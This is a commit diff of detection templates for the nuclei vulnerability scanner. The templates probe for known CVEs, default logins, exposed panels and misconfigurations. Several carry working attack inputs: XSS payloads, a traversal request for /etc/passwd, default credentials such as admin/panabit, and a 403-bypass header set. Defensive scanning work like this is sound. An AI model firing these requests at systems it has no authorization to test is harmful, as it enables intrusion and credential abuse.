Merge pull request #51 from projectdiscovery/master

Updation
2021-05-16 18:32:39 +05:30 · 2021-05-16 18:32:39 +05:30 · b90e02d078
parent 19fac7242e 5488370527
commit b90e02d078
58 changed files with 720 additions and 178 deletions
--- a/.github/workflows/syntax-checking.yml
+++ b/.github/workflows/syntax-checking.yml
@ -1,4 +1,4 @@
-name: syntax-checking
+name: ❄️ YAML Lint
 on: [push, pull_request]
--- a/.github/workflows/update-readme.yml
+++ b/.github/workflows/update-readme.yml
@ -1,4 +1,4 @@
-name: "Auto Update README"
+name: 📝 Readme Update
 on:
  push:
--- a/README.md
+++ b/README.md
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 309           | vulnerabilities | 152 | exposed-panels | 126 |
+| cves             | 311           | vulnerabilities | 153 | exposed-panels | 127 |
-| takeovers        | 67        | exposures       | 96       | technologies   | 66   |
+| takeovers        | 67        | exposures       | 99       | technologies   | 67   |
-| misconfiguration | 57 | workflows       | 30         | miscellaneous  | 20  |
+| misconfiguration | 62 | workflows       | 30         | miscellaneous  | 20  |
-| default-logins   | 24 | exposed-tokens  | 0  | dns            | 8            |
+| default-logins   | 26 | exposed-tokens  | 0  | dns            | 8            |
-| fuzzing          | 8          | helpers         | 8         | iot            | 11            |
+| fuzzing          | 9          | helpers         | 8         | iot            | 11            |
-**103 directories, 1068 files**.
+**105 directories, 1085 files**.
 </td>
 </tr>
--- a/cves/2009/CVE-2009-1151.yaml
+++ b/cves/2009/CVE-2009-1151.yaml
@ -7,7 +7,7 @@ info:
  description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
  vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
-  tags: phpmyadmin,rce,deserialization
+  tags: cve,cve2009,phpmyadmin,rce,deserialization
 requests:
  - raw:
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@ -10,6 +10,7 @@ info:
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
  description: |
       The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
  tags: cve,cve2015,jetty
 requests:
  - method: POST
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@ -0,0 +1,39 @@
 id: CVE-2017-12149
 info:
  name: Java/Jboss Deserialization [RCE]
  author: fopina
  severity: critical
  description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
  reference: |
        - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
        - https://chowdera.com/2020/12/20201229190934023w.html
        - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
  tags: cve,cve2017,java,rce,deserialization
 requests:
  - raw:
      - |
        POST /invoker/JMXInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
      - |
        POST /invoker/EJBInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ClassCastException"
        part: body
      - type: word
        words:
          - "application/x-java-serialized-object"
        part: header
--- a/cves/2017/CVE-2017-7269.yaml
+++ b/cves/2017/CVE-2017-7269.yaml
@ -1,25 +1,31 @@
 id: CVE-2017-7269
 info:
-  name: CVE-2017-7269
+  name: Windows Server 2003 & IIS 6.0 RCE
-  author: thomas_from_offensity
+  author: thomas_from_offensity & @geeknik
  severity: critical
-  description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
+  description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
-  reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
+  reference:
    - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
    - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
  tags: cve,cve2017,rce
 requests:
  - method: OPTIONS
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "IIS/6.0"
        part: header
      - type: dsl
        dsl:
          - regex("<DAV:sql>", dasl)    # lowercase header name: DASL
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@ -9,7 +9,7 @@ info:
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
-  tags: cve,cve2017,atlassian,jira,ssrf
+  tags: cve,cve2017,atlassian,jira,ssrf,oob
 requests:
  - raw:
--- a/cves/2018/CVE-2018-0101.yaml
+++ b/cves/2018/CVE-2018-0101.yaml
@ -1,62 +0,0 @@
 id: CVE-2018-0101
 info:
  name: Cisco ASA Denial-of-Service # Leads to RCE
  author: dwisiswant0
  severity: critical
  reference: https://www.exploit-db.com/exploits/43986
  description: |
    A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
    remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
    the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
  tags: cve,cve2018,cisco,dos,rce
 requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        X-Aggregate-Auth: 1
        X-Transcend-Version: 1
        Accept-Encoding: identity
        X-AnyConnect-Platform: linux-64
        X-Support-HTTP-Auth: false
        X-Pad: 0000000000000000000000000000000000000000
        <?xml version="1.0" encoding="UTF-8"?>
        <config-auth client="a" type="a" aggregate-auth-version="a">
            <host-scan-reply>A</host-scan-reply>
        </config-auth>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
      - type: dsl
        dsl:
          - "status_code_2 == 500"
          - "status_code_2 == 501"
          - "status_code_2 == 502"
          - "status_code_2 == 503"
          - "status_code_2 == 504"
        condition: or
      - type: dsl
        dsl:
          - "status_code_3 == 200"
        negative: true
--- a/cves/2018/CVE-2018-8770.yaml
+++ b/cves/2018/CVE-2018-8770.yaml
@ -7,7 +7,7 @@ info:
  reference: |
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
    - https://www.exploit-db.com/exploits/44495/
-  tags: cobub,razor,exposure
+  tags: cve,cve2018,cobub,razor,exposure
 requests:
  - method: GET
--- a/cves/2019/CVE-2019-17538.yaml
+++ b/cves/2019/CVE-2019-17538.yaml
@ -4,7 +4,7 @@ info:
  author: pussycat0x
  severity: high
  reference: https://github.com/shi-yang/jnoj/issues/53
-  tegs: cve.cve2019,jnoj,lfi
+  tags: cve.cve2019,jnoj,lfi
 requests:
  - raw:
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@ -4,6 +4,7 @@ info:
  name: Apache Cocoon 2.1.12 XML Injection
  author: pikpikcu
  severity: high
  tags: cve,cve2020,apache,xml,cocoon
  description: |
    When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
  reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
--- a/cves/2020/CVE-2020-13483.yaml
+++ b/cves/2020/CVE-2020-13483.yaml
@ -18,7 +18,7 @@ requests:
      - type: word
        words:
-          - "{alert(document.domain);}"
+          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
        part: body
      - type: word
--- a/cves/2020/CVE-2020-15500.yaml
+++ b/cves/2020/CVE-2020-15500.yaml
@ -11,7 +11,7 @@ info:
 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
+      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
    matchers-condition: and
    matchers:
@ -26,5 +26,5 @@ requests:
      - type: word
        words:
-          - '"><script>alert(document.domain);</script>'
+          - "'>\"<svg/onload=confirm('xss')>"
        part: body
--- a/cves/2020/CVE-2020-19625.yaml
+++ b/cves/2020/CVE-2020-19625.yaml
@ -26,4 +26,4 @@ requests:
        part: body
        group: 1
        regex:
-          - "<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>"
+          - '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
--- a/cves/2020/CVE-2020-28208.yaml
+++ b/cves/2020/CVE-2020-28208.yaml
@ -6,7 +6,7 @@ info:
  severity: medium
  description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
  reference: https://trovent.io/security-advisory-2010-01
-  tags: rockethchat
+  tags: cve,cve2020,rockethchat
 requests:
  - raw:
--- a/cves/2020/CVE-2020-29164.yaml
+++ b/cves/2020/CVE-2020-29164.yaml
@ -11,7 +11,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
+      - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
    matchers-condition: and
    matchers:
@ -25,3 +25,7 @@ requests:
        words:
          - '<img src="" onerror="alert(1);">1</img>'
        part: body
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-7247.yaml
+++ b/cves/2020/CVE-2020-7247.yaml
@ -4,7 +4,7 @@ info:
  author: princechaddha
  severity: critical
  reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
-  tags: cve,cve2020,smtp,opensmtpd,network,rce
+  tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
 network:
  - inputs:
--- a/cves/2021/CVE-2021-27651.yaml
+++ b/cves/2021/CVE-2021-27651.yaml
@ -0,0 +1,41 @@
 id: CVE-2021-27651
 info:
  name: Pega Infinity Authentication bypass
  author: idealphase
  description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
  reference: |
      - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
      - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
  severity: critical
  tags: cve,cve2021,pega,auth-bypass
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRAuth/app/default/"
    cookie-reuse: true
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Pega Infinity"
        part: body
      - type: regex
        regex:
          - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
        part: body
    extractors:
      - type: regex
        regex:
          - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
        part: body
--- a/cves/2021/CVE-2021-31537.yaml
+++ b/cves/2021/CVE-2021-31537.yaml
@ -0,0 +1,28 @@
 id: CVE-2021-31537
 info:
  name: SIS-REWE GO version 7.5.0/12C XSS
  author: geeknik
  description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
  reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
  severity: medium
  tags: cve,cve2021,xss
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>confirm({{randstr}})</script>"
          - "SIS-REWE"
        condition: and
      - type: word
        part: header
        words:
          - "text/html"
--- a/cves/2021/CVE-2021-31800.yaml
+++ b/cves/2021/CVE-2021-31800.yaml
@ -0,0 +1,23 @@
 id: CVE-2021-31800
 info:
  name: Impacket directory traversal
  author: geeknik
  description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
  reference: https://github.com/SecureAuthCorp/impacket/pull/1066
  severity: high
  tags: impacket,cve,cve2021,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
--- a/default-logins/panabit/panabit-default-password.yaml
+++ b/default-logins/panabit/panabit-default-password.yaml
@ -0,0 +1,45 @@
 id: panabit-gateway-defalut-password
 info:
  name: Panabit Default Password
  author: pikpikcu
  severity: high
  reference: https://max.book118.com/html/2017/0623/117514590.shtm
  tags: panabit,default-login
 requests:
  - raw:
      - |
        POST /login/userverify.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 246
        Origin: {{BaseURL}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
        Referer: {{BaseURL}}/login/login.htm
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Connection: close
        ------WebKitFormBoundaryAjZMsILtbrBp8VbC
        Content-Disposition: form-data; name="username"
        admin
        ------WebKitFormBoundaryAjZMsILtbrBp8VbC
        Content-Disposition: form-data; name="password"
        panabit
        ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
          - 'urn:schemas-microsoft-com:vml'
        part: body
        condition: and
      - type: status
        status:
          - 200
--- a/default-logins/showdoc/showdoc-default-password.yaml
+++ b/default-logins/showdoc/showdoc-default-password.yaml
@ -0,0 +1,31 @@
 id: showdoc-default-password
 info:
  name: Showdoc Default Password
  author: pikpikcu
  severity: medium
  reference: |
    - https://blog.star7th.com/2016/05/2007.html
  tags: showdoc,default-login
 requests:
  - method: POST
    path:
      - "{{BaseURL}}/server/index.php?s=/api/user/login"
    body: |
      username=showdoc&password=123456&v_code=
    headers:
      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":"showdoc"'
          - '"user_token":'
        condition: and
      - type: status
        status:
          - 200
--- a/exposed-panels/microsoft-exchange-control-panel.yaml
+++ b/exposed-panels/microsoft-exchange-control-panel.yaml
@ -0,0 +1,24 @@
 id: microsoft-exchange-control-panel
 info:
  name: Microsoft Exchange Control Panel
  author: r3dg33k
  severity: info
  description: Publicly accessible Microsoft Exchange Server Control Panel
  tags: microsoft,panel
  reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'Exchange Admin Center'
--- a/exposed-panels/tomcat-manager-pathnormalization.yaml
+++ b/exposed-panels/tomcat-manager-pathnormalization.yaml
@ -1,4 +1,5 @@
 id: tomcat-manager-pathnormalization
 info:
  name: Tomcat Manager Path Normalization
  author: organiccrap
@ -11,11 +12,17 @@ requests:
    path:
      - '{{BaseURL}}/..;/manager/html'
      - '{{BaseURL}}/..;/host-manager/html'
-    headers:
+
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - username="tomcat" password="s3cret"
+          - 'username="tomcat" password="s3cret"'
-          - manager-gui
+          - 'manager-gui'
        condition: and
      - type: status
        status:
          - 403
          - 401
        negative: true
--- a/exposures/backups/php-backup-files.yaml
+++ b/exposures/backups/php-backup-files.yaml
@ -0,0 +1,54 @@
 id: php-backup-files
 info:
  name: PHP source disclosure through backup files
  author: StreetOfHackerR007 (Rohit Soni)
  severity: medium
  tags: exposure,backup,php
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php.bak"
      - "{{BaseURL}}/default.php.bak"
      - "{{BaseURL}}/main.php.bak"
      - "{{BaseURL}}/config.php.bak"
      - "{{BaseURL}}/settings.php.bak"
      - "{{BaseURL}}/header.php.bak"
      - "{{BaseURL}}/footer.php.bak"
      - "{{BaseURL}}/login.php.bak"
      - "{{BaseURL}}/database.php.bak"
      - "{{BaseURL}}/db.php.bak"
      - "{{BaseURL}}/conn.php.bak"
      - "{{BaseURL}}/db_config.php.bak"
      - "{{BaseURL}}/404.php.bak"
      - "{{BaseURL}}/wp-config.php.bak"
      - "{{BaseURL}}/wp-login.php.bak"
    redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<?php"
          - "<?="
        condition: or
        part: body
      - type: word
        words:
          - "?>"
        part: body
      - type: word
        words:
          - "text/plain"
          - "bytes"
        part: header
        condition: or
--- a/exposures/configs/git-config-nginxoffbyslash.yaml
+++ b/exposures/configs/git-config-nginxoffbyslash.yaml
@ -5,7 +5,9 @@ info:
  severity: medium
  description: Nginx off-by-slash vulnerability exposes Git configuration.
  tags: config,exposure
-  reference: https://twitter.com/Random_Robbie/status/1262676628167110656
+  reference: |
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
 requests:
  - method: GET
--- a/exposures/configs/laravel-env.yaml
+++ b/exposures/configs/laravel-env.yaml
@ -17,7 +17,6 @@ requests:
      - "{{BaseURL}}/.env.prod.local"
      - "{{BaseURL}}/.env.production.local"
      - "{{BaseURL}}/.env.local"
      - "{{BaseURL}}/.env.example"
      - "{{BaseURL}}/.env.stage"
      - "{{BaseURL}}/.env.live"
    matchers-condition: and
--- a/exposures/configs/ruijie-phpinfo.yaml
+++ b/exposures/configs/ruijie-phpinfo.yaml
@ -0,0 +1,25 @@
 id: ruijie-phpinfo
 info:
  name: Ruijie Phpinfo
  author: pikpikcu
  severity: low
  reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
  tags: phpinfo,rujjie,config,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/tool/view/phpinfo.view.php"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Version"
          - "PHP Extension"
        condition: and
      - type: status
        status:
          - 200
--- a/fuzzing/xff-403-bypass.yaml
+++ b/fuzzing/xff-403-bypass.yaml
@ -0,0 +1,47 @@
 id: xff-403-bypass
 info:
  name: X-Forwarded-For 403-forbidden bypass
  author: vavkamil
  severity: info
  description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
  tags: xff,bypass,fuzz
 requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip
        X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
      - |
        GET /test.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip
        X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403 && status_code_2 != 403"
          - "status_code_1 == 403 && status_code_3 != 403"
        condition: or
--- a/misconfiguration/apache-filename-brute-force.yaml
+++ b/misconfiguration/apache-filename-brute-force.yaml
@ -0,0 +1,29 @@
 id: apache-filename-brute-force
 info:
  name: Apache Filename Brute Force
  author: geeknik
  description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing.
  reference: |
    - https://hackerone.com/reports/210238
    - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/
  severity: low
  tags: apache
 requests:
  - method: GET
    headers:
      Accept: "fake/value"
    path:
      - "{{BaseURL}}/index"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 406
      - type: word
        words:
          - "Not Acceptable"
          - "Available variants:"
          - "<address>Apache Server at"
        condition: and
--- a/misconfiguration/cloudflare-image-ssrf.yaml
+++ b/misconfiguration/cloudflare-image-ssrf.yaml
@ -0,0 +1,25 @@
 id: cloudflare-external-image-resize
 info:
  name: Cloudflare External Image Resizing Misconfiguration
  author: vavkamil
  severity: info
  description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
  reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
  tags: cloudflare,misconfig,oob
 requests:
  - raw:
      - |
        GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
        Connection: close
        Accept: */*
        Accept-Language: en
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
--- a/misconfiguration/springboot/springboot-configprops.yaml
+++ b/misconfiguration/springboot/springboot-configprops.yaml
@ -5,6 +5,7 @@ info:
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: low
  description: Sensitive environment variables may not be masked
  tags: springboot,disclosure
 requests:
  - method: GET
--- a/misconfiguration/springboot/springboot-env.yaml
+++ b/misconfiguration/springboot/springboot-env.yaml
@ -3,8 +3,9 @@ id: springboot-env
 info:
  name: Detect Springboot Env Actuator
  author: that_juan_ & dwisiswant0 & wdahlenb
-  severity: high
+  severity: low
  description: Sensitive environment variables may not be masked
  tags: springboot,disclosure
 requests:
  - method: GET
@ -17,8 +18,14 @@ requests:
        part: body
        words:
          - "applicationConfig"
      - type: word
        part: body
        words:
          - "server.port"
          - "local.server.port"
-        condition: and
+        condition: or
      - type: status
        status:
          - 200
--- a/misconfiguration/springboot/springboot-heapdump.yaml
+++ b/misconfiguration/springboot/springboot-heapdump.yaml
@ -5,12 +5,15 @@ info:
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: critical
  description: Environment variables and HTTP requests can be found in the HPROF
  tags: springboot,disclosure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/heapdump"
      - "{{BaseURL}}/actuator/heapdump"
    max-size: 2097152 # 2MB - Max Size to read from server response
    matchers-condition: and
    matchers:
      - type: binary
@ -20,16 +23,19 @@ requests:
          - "4850524f46" # "HPROF"
          - "1f8b080000000000" # Gunzip magic byte
        condition: or
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/octet-stream"
          - "application/vnd.spring-boot.actuator"
          - "application/vnd.spring-boot.actuator.v1+json"
        condition: or
        part: header
        condition: or
      - type: dsl
        dsl:
          - "len(body) >= 100000"
--- a/misconfiguration/springboot/springboot-httptrace.yaml
+++ b/misconfiguration/springboot/springboot-httptrace.yaml
@ -5,6 +5,7 @@ info:
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: low
  description: View recent HTTP requests and responses
  tags: springboot,disclosure
 requests:
  - method: GET
--- a/misconfiguration/springboot/springboot-loggers.yaml
+++ b/misconfiguration/springboot/springboot-loggers.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Springboot Loggers
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: low
  tags: springboot,disclosure
 requests:
  - method: GET
--- a/misconfiguration/springboot/springboot-mappings.yaml
+++ b/misconfiguration/springboot/springboot-mappings.yaml
@ -5,6 +5,7 @@ info:
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: low
  description: Additional routes may be displayed
  tags: springboot,disclosure
 requests:
  - method: GET
--- a/misconfiguration/springboot/springboot-trace.yaml
+++ b/misconfiguration/springboot/springboot-trace.yaml
@ -5,11 +5,13 @@ info:
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: low
  description: View recent HTTP requests and responses
  tags: springboot,disclosure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/trace"
    matchers-condition: and
    matchers:
      - type: word
--- a/network/rdp-detect.yaml
+++ b/network/rdp-detect.yaml
@ -0,0 +1,59 @@
 id: rdp-detect
 info:
  name: Windows RDP Detection
  author: princechaddha
  severity: info
  tags: windows,rdp,network
 network:
  - inputs:
      - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000"
        type: hex
        read-size: 2048
    host:
      - "{{Hostname}}"
      - "{{Hostname}}:3389"
    matchers:
      - type: word
        encoding: hex
        name: win2000
        words:
          - "0300000b06d00000123400"
      - type: word
        encoding: hex
        name: win2003
        words:
          - "030000130ed000001234000300080002000000"
      - type: word
        encoding: hex
        name: win2008
        words:
          - "030000130ed000001234000200080002000000"
      - type: word
        encoding: hex
        name: win7or2008R2
        words:
          - "030000130ed000001234000209080002000000"
      - type: word
        encoding: hex
        name: win2008R2DC
        words:
          - "030000130ed000001234000201080002000000"
      - type: word
        encoding: hex
        name: win10
        words:
          - "030000130ed00000123400021f080002000000"
      - type: word
        encoding: hex
        name: win2012R2OR8
        words:
          - "030000130ed00000123400020f080002000000"
      - type: word
        encoding: hex
        name: win2016
        words:
          - "030000130ed00000123400021f080008000000"
--- a/technologies/detect-springboot-actuator.yaml
+++ b/technologies/detect-springboot-actuator.yaml
@ -1,20 +0,0 @@
 id: detect-springboot-actuator
 info:
  name: Detect Springboot Actuators
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: info
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/actuator"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"_links":{"self"'
      - type: status
        status:
          - 200
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@ -0,0 +1,27 @@
 id: springboot-actuator
 info:
  name: Detect Springboot Actuators
  author: that_juan_ & dwisiswant0 & wdahlenb
  severity: info
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/actuator"
      - "{{BaseURL}}/favicon.ico"
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '"_links":'
          - '"self":'
          - '"health"'
        condition: and
      - type: dsl
        name: "favicon"
        dsl:
          - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))"
--- a/technologies/wazuh-detect.yaml
+++ b/technologies/wazuh-detect.yaml
@ -0,0 +1,25 @@
 id: wazuh-detect
 info:
  name: wazuh detect
  author: cyllective
  severity: info
  description: Detects wazuh
  tags: tech,wazuh
  references:
    - https://github.com/wazuh/wazuh
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/app/login"
    matchers:
      - type: word
        part: body
        condition: or
        words:
          - '&quot;id&quot;:&quot;wazuh&quot;'
          - '&quot;title&quot;:&quot;Wazuh&quot;'
          - '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
          - '&quot;url&quot;:&quot;/app/wazuh&quot;'
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@ -21,10 +21,7 @@ requests:
      - '{{BaseURL}}/example%E3%80%82com'
      - '{{BaseURL}}/%5Cexample.com'
      - '{{BaseURL}}/example.com'
